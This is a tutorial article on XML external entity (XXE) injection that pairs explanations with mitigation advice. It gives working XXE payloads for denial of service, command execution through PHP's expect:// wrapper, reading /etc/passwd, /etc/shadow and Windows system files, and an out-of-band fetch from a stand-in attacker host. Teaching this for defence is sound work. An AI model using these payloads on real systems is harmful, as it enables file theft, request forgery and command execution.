XXE Attack

What is XXE?

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It arises when the application hands attacker-controlled XML to a parser that accepts a DOCTYPE and resolves the external entities declared in it. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

How do you perform XXE?

Denial of service: referencing a local resource that never finishes returning data

The entity below points at /dev/random, which keeps producing output for as long as it is read. A parser that resolves it blocks trying to read the "file" to its end, tying up the worker that is handling the request; enough such requests and the service stops responding.


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///dev/random" >]>
<foo>&xxe;</foo>

Remote code execution

PHP's expect:// stream wrapper is provided by the "expect" PECL extension, which is not part of a default PHP installation, so this only works if fortune is on our side and the module is loaded. When it is, the parser hands the entity's system identifier to the wrapper, the command after expect:// is executed, and its output is substituted for the entity, so the response carries the output of id. Let's modify the payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE creds [
  <!ELEMENT creds ANY >
  <!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
  <user>&xxe;</user>
  <pass>mypass</pass>
</creds>

Disclosing /etc/passwd or other targeted files

Reading /etc/passwd on Linux, the usual proof of concept:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

/etc/shadow is readable only by root, so this variant succeeds only if the application itself runs with that privilege:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<foo>&xxe;</foo>

On Windows, c:/boot.ini exists on older releases (Windows XP / Server 2003); on current versions a file such as c:/windows/win.ini serves the same purpose:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<foo>&xxe;</foo>

The system identifier can also be a URL. The parser then fetches it from the server side, which is what turns XXE into SSRF. Here it fetches a file from the attacker's own host; even when the response is blind, the incoming request to that host confirms the vulnerability:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>

What are the different types of attacks you can perform through XXE?

  • Exploiting XXE to retrieve files, where an external entity is defined containing the contents of a file, and returned in the application's response.
  • Exploiting XXE to perform SSRF attacks, where an external entity is defined based on a URL to a back-end system.
  • Exploiting blind XXE to exfiltrate data out-of-band, where sensitive data is transmitted from the application server to a system that the attacker controls.
  • Exploiting blind XXE to retrieve data via error messages, where the attacker can trigger a parsing error message containing sensitive data.

How can you mitigate this?

Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

Generally, it is sufficient to disable resolution of external entities (both general and parameter entities, since the blind and out-of-band techniques rely on the latter) and to disable support for XInclude. If the application never needs a DTD at all, rejecting any document that contains a DOCTYPE is simpler still and also stops entity-expansion denial of service such as the "billion laughs" attack. This can usually be done via configuration options or by programmatically overriding default behaviour; defaults differ between libraries and versions, so do not assume a parser is safe without checking. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.
Reference:

https://portswigger.net/web-security/xxe

https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/

Article by Nitin Bhanderi.